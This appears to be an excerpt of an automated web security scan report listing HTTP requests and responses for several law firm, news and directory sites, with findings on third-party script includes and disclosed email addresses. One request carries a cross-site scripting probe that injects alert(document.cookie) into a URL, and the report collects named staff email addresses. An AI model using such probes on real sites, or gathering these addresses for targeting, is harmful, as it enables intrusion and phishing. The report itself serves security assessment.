HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Wed, 19 Jan 2011 15:23:41 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 13114
GET /event-log-analysis-sm/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
GET /config/login?.src=fpctx&logout=1&r= HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:21 GMT Set-Cookie: B=76otfft6jea6h&b=3&s=5d; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: Y=%2e; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: SSL=%2e; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com; secure P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 18382
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... </script> <script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script> ...[SNIP]...
GET /lab/innerfade/ HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:39 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 14265
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... </script> <script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script> ...[SNIP]... </script> <script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/main.js" type="text/javascript"></script> <script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/bc_page.js" type="text/javascript"></script> <script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/2.0/fortune500_2008.js" type="text/javascript"></script> ...[SNIP]... </div> <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script> <div id="header"> <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/search_form.js" type="text/javascript"></script> ...[SNIP]... </style> <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script> ...[SNIP]... </script> <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/navigation/2.0/nav_fortune.js"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/3.0/services/connect-lite.js"></script> ...[SNIP]... <!-- end footer --> <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js"></script> ...[SNIP]... </script>
GET /rafaelp HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:15:07 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20381
GET /domainserve/domainView HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... </style> <script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script> ...[SNIP]...
GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Content-Length: 80578 Content-Type: text/html; charset=utf-8 X-Powered-By: eZ Publish Content-Language: en-US Served-by: Pragma: Cache-Control: max-age=2959 Expires: Wed, 19 Jan 2011 16:37:01 GMT Date: Wed, 19 Jan 2011 15:47:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /chamber/memberDetail.asp HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:47:49 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... </script>
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... </script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells is a law firm that sees the whole picture an ...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script> ...[SNIP]... </form> <script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells is advising Citi Infrastructure Investors, o ...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script> ...[SNIP]... </form> <script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script> ...[SNIP]...
GET /washington%20dc%20law%20firms HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET / HTTP/1.1 Host: www.kasimer-ittig.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /2011insights.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... </script>
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <!-- end border table -->
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
GET /gypr.aspx?afid=1993&cc=5411105100&cr=3209505169&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:09:38 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:09:38 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... <body>
The response dynamically includes the following scripts from other domains:
http://cdn.gigya.com/JS/socialize.js?apikey=null
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </script>
The response dynamically includes the following script from another domain:
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /index.cfm HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The response dynamically includes the following script from another domain:
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /x22 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 15:29:16 GMT Status: 404 Not Found Server: nginx Content-Type: text/html Connection: keep-alive Content-Length: 214516
<!DOCTYPE html> <html> <head>
<title>Page Not Found - YP.com</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="" name="description" /> <meta content="" name ...[SNIP]... <![endif]--> <script src="http://i2.ypcdn.com/webyp/javascripts/css_browser_selector.js?12909" type="text/javascript"></script>
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
pcware@tiac.net
pcwh@erols.com
Request
GET /computer.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:31 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 88403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The following email address was disclosed in the response:
sbaird@a-job.com
Request
GET /jobs.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:51 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 51092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
...[SNIP]... </i>--Creative One Source represents the region.s top freelance web and interactive media talent. Sally Baird at (703) 299-6100 or e-mail sbaird@a-job.com<br> ...[SNIP]...
The following email addresses were disclosed in the response:
LISTSERV@PAHO.ORG
RITCH-L@PAHO.ORG
marco@clark.net
Request
GET /other.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:22:08 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 159702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The following email addresses were disclosed in the response:
dcreg@usedbks.com
maxwonder@aa.action.com
uws333@haven.los.com
Request
GET /shopping.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:22:14 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 108349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The following email address was disclosed in the response:
todd@wpaudio.com
Request
GET /wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js?ver=3.1 HTTP/1.1 Host: financaspessoais.blog.br Proxy-Connection: keep-alive Referer: http://financaspessoais.blog.br/?f8184%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec42c81b1212=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=239951252.1295480312.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/51; __utma=239951252.1616361418.1295480312.1295480312.1295480312.1; __utmc=239951252; __utmb=239951252.1.10.1295480312
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 23:37:43 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch Last-Modified: Tue, 09 Nov 2010 17:06:21 GMT ETag: "1e855a-22a4-494a1c2853d40" Accept-Ranges: bytes Content-Length: 8868 Connection: close Content-Type: application/x-javascript
/* * WPaudio v3.1 (http://wpaudio.com) * by Todd Iceton (todd@wpaudio.com) * * Converts an mp3 link to a simple player styled by HTML & CSS, powered by HTML5 with SoundManager2 Flash fallback * * Copyright 2010 Todd Iceton (email: todd@wpaudio.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of ...[SNIP]...
The following email address was disclosed in the response:
sales@gfi.com
Request
GET /event-log-analysis-sm/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
The following email address was disclosed in the response:
free2rhyme@yahoo.com
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... <p id='ex'>(e.g. free2rhyme@yahoo.com)</p> ...[SNIP]...
The following email address was disclosed in the response:
john.doe@asdf.com
Request
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <input name="email0" value="john.doe@asdf.com" type="radio">john.doe@asdf.com</li> ...[SNIP]...
The following email addresses were disclosed in the response:
amy.sabrin@skadden.com
greg.luce@skadden.com
jen.spaziano@skadden.com
mitchell.ettinger@skadden.com
Request
GET /fca/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email addresses were disclosed in the response:
brian.mccarthy@skadden.com
greg.luce@skadden.com
mark.cheffo@skadden.com
matthew.kipp@skadden.com
michael.loucks@skadden.com
Request
GET /hc/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
sam@twittercounter.com
Request
GET /rafaelp HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:15:07 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a href="mailto:sam@twittercounter.com" rel="nofollow" title="Get in contact with TwitterCounter"> ...[SNIP]...
The following email address was disclosed in the response:
Marsha.Tucker@aporter.com
Request
GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The following email address was disclosed in the response:
events@aporter.com
Request
GET /events.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The following email addresses were disclosed in the response:
Stephen.DiGennaro@aporter.com
mailings.administrator@aporter.com
Request
GET /globals_privacy_policy.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.cov.com/zh-CN/offices/office.aspx?office=64">here</a>.</h2> </body></html>
